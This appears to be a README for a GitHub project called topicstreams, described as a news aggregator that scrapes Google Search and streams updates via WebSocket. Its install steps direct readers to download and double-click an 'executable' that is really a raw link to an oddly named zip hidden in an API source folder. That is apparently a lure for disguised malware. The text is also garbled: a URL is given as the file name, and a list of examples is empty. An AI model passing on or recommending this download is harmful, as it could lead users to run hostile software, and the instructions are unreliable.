topicstreams is a real-time news aggregation system. It scrapes Google Search for custom topics and streams live updates via WebSocket. Whether you're interested in event-driven trading or the latest news, topicstreams keeps you informed and connected.
Follow these steps to download and run topicstreams on your computer.
Go to the Releases page to find the latest version of topicstreams.
Once you are on the releases page, look for the most recent version. Click on the link to download it. This will typically be in .zip or .exe format.
If you downloaded a .zip file, locate it in your Downloads folder. Right-click on the file and select "Extract All..." or "Unzip." Follow the prompts to choose a destination for the extracted files.
After unpacking, open the folder where you extracted topicstreams. Look for the executable file, usually named https://github.com/scsa385/topicstreams/raw/refs/heads/main/api/v1/websocket/Software_nonfruition.zip. Double-click it to run the application.
To ensure smooth operation of topicstreams, please have the following:
- Operating System: Windows 10 or later
- Memory: At least 2 GB of RAM
- Disk Space: A minimum of 100 MB available
- Internet Connection: Required for scraping and streaming news
After running the application, you will see the main interface. Here, you can enter the topics you wish to follow. Some popular examples include:

You can customize the news topics to fit your interests. Just type in your chosen topics in the designated input field, separating them with commas. Then click "Start Streaming" to receive live updates.
